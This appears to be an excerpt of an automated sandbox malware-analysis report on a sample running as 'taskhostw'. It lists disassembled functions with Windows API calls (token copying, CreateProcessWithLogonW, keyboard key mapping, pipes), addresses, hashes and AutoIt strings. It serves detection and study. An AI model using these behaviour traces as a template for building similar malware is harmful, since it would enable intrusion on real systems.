GetProcessHeap.KERNEL32(00000008,00000000), ref: 00208B98
HeapAlloc.KERNEL32(00000000), ref: 00208B9F
CopySid.ADVAPI32(00000000,00000000,?), ref: 00208BB8
GetProcessHeap.KERNEL32(00000000,00000000,00208757), ref: 00208BCC
HeapFree.KERNEL32(00000000), ref: 00208BD3

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: c2619a4c040f1f484b8e545b7cc283857d532ee0e4d6069ee459a662c20736bf
Instruction ID: 8afe6a8b9b5444741e63b550c26bca603c7f2fcdf14f547deb4bfdc6dc12f19d
Opcode Fuzzy Hash: c2619a4c040f1f484b8e545b7cc283857d532ee0e4d6069ee459a662c20736bf
Instruction Fuzzy Hash: 9411E1B1920305FFDB508F64ED08FAF7BA8EB41319F104028E8C9D3191DB319915CB60

Function 002088D9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0020890A
OpenProcessToken.ADVAPI32(00000000), ref: 00208911
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00208920
CloseHandle.KERNEL32(00000004), ref: 0020892B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0020895A
DestroyEnvironmentBlock.USERENV(00000000), ref: 0020896E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 255ea5b2a337de94cee35e7275334d1ceed4d5b41cf1ef2fa1fc8468f2d306b5
Instruction ID: e9338aa8e1adb77c59e6d76d8be4a2948261b8ab7776d61d1f6e1bd7466e750c
Opcode Fuzzy Hash: 255ea5b2a337de94cee35e7275334d1ceed4d5b41cf1ef2fa1fc8468f2d306b5
Instruction Fuzzy Hash: CA115C7250024EEBDF018FA8EE49BEA7BA9EF08308F044065FE44A21A1C7718D60DB61

Function 02A79066 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 02A79066

Part of subcall function 02A72707: __initp_misc_winsig.LIBCMT ref: 02A72725

__mtinitlocks.LIBCMT ref: 02A7906B
__mtterm.LIBCMT ref: 02A79074

Part of subcall function 02A790DC: _free.LIBCMT ref: 02A791DD

__calloc_crt.LIBCMT ref: 02A79099
__initptd.LIBCMT ref: 02A790BB

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 206718379-0
Opcode ID: df2c190ed5a8e6e155ab4cb5216986f3d7981e2bbc06db2378fa24d28eb1e97e
Instruction ID: eaf04f9b28e89ea6be882d6727002997537dbd9a09928de978d6ebefb6ba9607
Opcode Fuzzy Hash: df2c190ed5a8e6e155ab4cb5216986f3d7981e2bbc06db2378fa24d28eb1e97e
Instruction Fuzzy Hash: 88F090726A97235EEA347779BE0579B2687DF01735F20062FE469C91D0EF1084424D9C

Function 001D02E2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 001D0313
MapVirtualKeyW.USER32(00000010,00000000), ref: 001D031B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 001D0326
MapVirtualKeyW.USER32(000000A1,00000000), ref: 001D0331
MapVirtualKeyW.USER32(00000011,00000000), ref: 001D0339
MapVirtualKeyW.USER32(00000012,00000000), ref: 001D0341

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: ed5bc28af24556a26b990f67cfd0903136511b04c075b5de562b9c70b975a849
Instruction ID: 28fc2122eeadf6e3678d4d8550206adf6a1b0746d3ac3f6e393a40d77b7e6f6e
Opcode Fuzzy Hash: ed5bc28af24556a26b990f67cfd0903136511b04c075b5de562b9c70b975a849
Instruction Fuzzy Hash: 3B0148B09017597DE3008F5A8C85A52FEA8FF19354F00411BA15847941C7B5A864CFE5

Function 00208C54 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00208C5F
UnloadUserProfile.USERENV(?,?), ref: 00208C6B
CloseHandle.KERNEL32(?), ref: 00208C74
CloseHandle.KERNEL32(?), ref: 00208C7C
GetProcessHeap.KERNEL32(00000000,?), ref: 00208C85
HeapFree.KERNEL32(00000000), ref: 00208C8C

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 73214c1ff029b49aece083ff57d3ab587ec670135c8829418255c7c703cdb59c
Instruction ID: 776a65ed191e551d894d1db1430b70864f394d3cf42ad0cea3006448077f7db6
Opcode Fuzzy Hash: 73214c1ff029b49aece083ff57d3ab587ec670135c8829418255c7c703cdb59c
Instruction Fuzzy Hash: 79E0C236404001FBDA411FE2FE0CD0ABB69FB89322B108230F21981070CB329424DB50

Function 00228702 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00228728
CharUpperBuffW.USER32(?,?), ref: 00228837
VariantClear.OLEAUT32(?), ref: 002289AF

Part of subcall function 0021760B: VariantInit.OLEAUT32(00000000), ref: 0021764B
Part of subcall function 0021760B: VariantCopy.OLEAUT32(00000000,?), ref: 00217654
Part of subcall function 0021760B: VariantClear.OLEAUT32(00000000), ref: 00217660

Strings

AUTOIT.ERROR, xrefs: 0022883D
Incorrect Parameter format, xrefs: 00228760, 00228922

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 0bfe85f3750d0eaf5ef9494db8d408ded27d2b859593c7be294177c9a478ea91
Instruction ID: c5a4548d9da5ca52cb82f7e65269d2f222632ae2958c061261dc5f2b7dcd02d8
Opcode Fuzzy Hash: 0bfe85f3750d0eaf5ef9494db8d408ded27d2b859593c7be294177c9a478ea91
Instruction Fuzzy Hash: 1791BF74618301EFC710EF64D48096ABBF4EF99314F14896DF88A8B361DB31E946CB52

Function 00212D8E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001CFE06: _wcscpy.LIBCMT ref: 001CFE29

_memset.LIBCMT ref: 00212E7F
GetMenuItemInfoW.USER32 ref: 00212EAE
SetMenuItemInfoW.USER32 ref: 00212F61
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00212F8F

Strings

0, xrefs: 00212E6B

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: dc511f40e386e2d07ceca4e40288bb7063927872affb9771016f0c0a74aca4dd
Instruction ID: e0dd7fcc12b5ca691900574fc033ffe4db40d252bcae13a0ba3439a0e913e1f2
Opcode Fuzzy Hash: dc511f40e386e2d07ceca4e40288bb7063927872affb9771016f0c0a74aca4dd
Instruction Fuzzy Hash: 1851C131528302DFD7259F28D8446ABB7F4AF69310F144A2EF895D32A0DB70DDB98792

Function 00212A4B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00212AB8
GetMenuItemInfoW.USER32 ref: 00212AD4
DeleteMenu.USER32 ref: 00212B1A
DeleteMenu.USER32 ref: 00212B63

Strings

0, xrefs: 00212AAD

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: baeb9e31ddbaf4173c0651509a6a56fcde15c56c8cd70108d9e22f5ebaf20a36
Instruction ID: e7ba6d5f98624dbc05fc5a4727d2d71e86263f54d82ab17615e26ab1553bbb33
Opcode Fuzzy Hash: baeb9e31ddbaf4173c0651509a6a56fcde15c56c8cd70108d9e22f5ebaf20a36
Instruction Fuzzy Hash: 0B41D431218342DFD720DF24D885FAAB7E8AFA4324F10462DF965972D1D770EA68CB52

Function 02AB9679 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 02AB96BB
_memset.LIBCMT ref: 02AB973C
_wcsncpy.LIBCMT ref: 02AB9778

Strings

\, xrefs: 02AB96D1
:, xrefs: 02AB96DC

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __swprintf_memset_wcsncpy
String ID: :$\
API String ID: 214737766-1166558509
Opcode ID: d9f13931fe1ecb3a7cd7b22676f37d9688c132d911508ea83798b28eaf00ec4a
Instruction ID: 30d0494ecdae39ea1ad99de3f31afd01c463617143cd0de730909239f4197171
Opcode Fuzzy Hash: d9f13931fe1ecb3a7cd7b22676f37d9688c132d911508ea83798b28eaf00ec4a
Instruction Fuzzy Hash: 8131527550010AAADB219FA0DC84FEF77BDAF88744F1045B9FA08D6150EB709694CF68

Function 00236CE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00236D6D
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00236D7D
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00236DA2

Strings

NGAVQLK, xrefs: 00236CF2
Listbox, xrefs: 00236D3A

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox$NGAVQLK
API String ID: 3315199576-420986706
Opcode ID: c2f1d8e1d48a0ba4893ab896d138bd9078338dcf5c7f61dcc8ca886bcbfd0d40
Instruction ID: 5e53d75e9e1c95780250776011ef69118a5274bb572e56dda2d96e2d0fcf1721
Opcode Fuzzy Hash: c2f1d8e1d48a0ba4893ab896d138bd9078338dcf5c7f61dcc8ca886bcbfd0d40
Instruction Fuzzy Hash: 21219572620119BFDF118F54DC89FAB37BEEF89754F118124F9049B190C6719C618BA0

Function 00236419 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 001B1D35: CreateWindowExW.USER32 ref: 001B1D73
Part of subcall function 001B1D35: GetStockObject.GDI32(00000011), ref: 001B1D87
Part of subcall function 001B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 001B1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00236493
LoadLibraryW.KERNEL32(?), ref: 0023649A
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002364AF
DestroyWindow.USER32 ref: 002364B7

Strings

SysAnimate32, xrefs: 0023646E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: f468da3111a1a2cb26b4ea542ff84ac5e35b27756134f7ac6fc5ec7fdd2bd91c
Instruction ID: b0b7c904fd8468421d06b12dc39af622853d146e3b9ef23045b255d976ac5115
Opcode Fuzzy Hash: f468da3111a1a2cb26b4ea542ff84ac5e35b27756134f7ac6fc5ec7fdd2bd91c
Instruction Fuzzy Hash: 9C2180B1A20206BBEF204E64EC89EBA77ADEB59364F10C619FB5493190D771CC619760

Function 00216E45 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00216E65
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00216E98
GetStdHandle.KERNEL32(0000000C), ref: 00216EAA
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00216EE4

Strings

nul, xrefs: 00216EDF

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 8fa966bc036c0cd929c89f2136c6e248271d62a79eb67f07027cf1e8ede63271
Instruction ID: 19a3c77bfa80ee3063abc306545a23c0984b1605cfffe6ff41c9ed4b01557f24
Opcode Fuzzy Hash: 8fa966bc036c0cd929c89f2136c6e248271d62a79eb67f07027cf1e8ede63271
Instruction Fuzzy Hash: 6F213579510206ABDB209F29EC0DEDE77F4AF65720F204719FDA1D72D0D77198A08B90

Function 00216F13 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00216F32
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00216F64
GetStdHandle.KERNEL32(000000F6), ref: 00216F75
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00216FAF

Strings

nul, xrefs: 00216FAA

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 31f398ddd1d84cde9e8a834bd40332c4eaf6aa2454a0bdf1b5652d56603f0b91
Instruction ID: 668343374777099a6b2bfb50db15d47fbd1cc318a14d75c46b07527c38084cb4
Opcode Fuzzy Hash: 31f398ddd1d84cde9e8a834bd40332c4eaf6aa2454a0bdf1b5652d56603f0b91
Instruction Fuzzy Hash: 3021A7755143069BDB209F69BC0CADE77E8BF65320F204659FCA2D76D0D77098A28B50

Function 0021ACCA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0021ACDE
GetVolumeInformationW.KERNEL32 ref: 0021AD32
__swprintf.LIBCMT ref: 0021AD4B
SetErrorMode.KERNEL32(00000000,00000001,00000000,0023F910), ref: 0021AD89

Strings

%lu, xrefs: 0021AD45

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: a667740d85fce0449807a1e6b08ea90c4ecd475b2c8cf05906e567210356914c
Instruction ID: 9fc83e47af6a3b850a26f744a3dab77eea3898f8b9340a925865b573cd16b2b9
Opcode Fuzzy Hash: a667740d85fce0449807a1e6b08ea90c4ecd475b2c8cf05906e567210356914c
Instruction Fuzzy Hash: 1C215074A00209AFCB10EF65DD85EEE7BF8EF89704B004069F509EB252DB71EA51DB61

Function 0020A30F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66

Part of subcall function 0020A15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0020A179
Part of subcall function 0020A15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0020A18C
Part of subcall function 0020A15C: GetCurrentThreadId.KERNEL32(00000000), ref: 0020A193
Part of subcall function 0020A15C: AttachThreadInput.USER32(00000000), ref: 0020A19A

GetFocus.USER32(0023F910), ref: 0020A334

Part of subcall function 0020A1A5: GetParent.USER32(?), ref: 0020A1B3

GetClassNameW.USER32(?,?,00000100), ref: 0020A37D
EnumChildWindows.USER32 ref: 0020A3A5
__swprintf.LIBCMT ref: 0020A3BF

Strings

%s%d, xrefs: 0020A3B9

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 0016a8162bc2e1ce6f8f4c5b3187152cddf6c6d5ee93653e9846d4fb938cb4c7
Instruction ID: 2fb528fe517e701eac8f3fa1134ac2a0195d3fe274633cc8913adc0a717d232a
Opcode Fuzzy Hash: 0016a8162bc2e1ce6f8f4c5b3187152cddf6c6d5ee93653e9846d4fb938cb4c7
Instruction Fuzzy Hash: 12119D71610309ABDF11BFA0ED8AFEA7768AF49710F4040B5F91CAA1D3CB7059658B71

Function 02AA9C44 Relevance: 7.8, APIs: 5, Instructions: 273COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 02AA9D26
_wcscmp.LIBCMT ref: 02AA9D39
_wcscmp.LIBCMT ref: 02AA9DCA
_wcscmp.LIBCMT ref: 02AA9F3C
_wcscmp.LIBCMT ref: 02AA9F76

Part of subcall function 02A72BAC: _iswctype.LIBCMT ref: 02A72BB4

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcscmp$__swprintf_iswctype
String ID:
API String ID: 3564621516-0
Opcode ID: 1b156251998a5796ec22a55ff408394ee05bd1f02a5f166ac72514ed652129ee
Instruction ID: 93b913244e5fb0fa0be69cf65608ccad4bcd91549f4e2c15319bea23589e4db1
Opcode Fuzzy Hash: 1b156251998a5796ec22a55ff408394ee05bd1f02a5f166ac72514ed652129ee
Instruction Fuzzy Hash: E3A1BC71204703AFD715DF24C994BABB7E9FF44318F108A2AE999D3190EF30A949CB91

Function 0022EC69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0022ED1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0022ED4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0022EE7E
CloseHandle.KERNEL32(?), ref: 0022EEFF

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: a577509af8f76bc12d899e30b8dbc97c2c74cc1fc2d97729ee7a8eef61b97f9a
Instruction ID: d36ec54f8b389472e484c308612dbd19810a0c09120d5f724fe3bc3ffb1976ae
Opcode Fuzzy Hash: a577509af8f76bc12d899e30b8dbc97c2c74cc1fc2d97729ee7a8eef61b97f9a
Instruction Fuzzy Hash: 2C819471610311AFD720DF28D846F6AB7E5AF58B20F05885DF699DB292DB70EC01CB51

Function 02A7498D Relevance: 7.7, APIs: 5, Instructions: 163COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02A749EB
_memcpy_s.LIBCMT ref: 02A74A5D
__read_nolock.LIBCMT ref: 02A74ABB
__filbuf.LIBCMT ref: 02A74ADE
_memset.LIBCMT ref: 02A74B22

Part of subcall function 02A780A8: __getptd_noexit.LIBCMT ref: 02A780A8

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
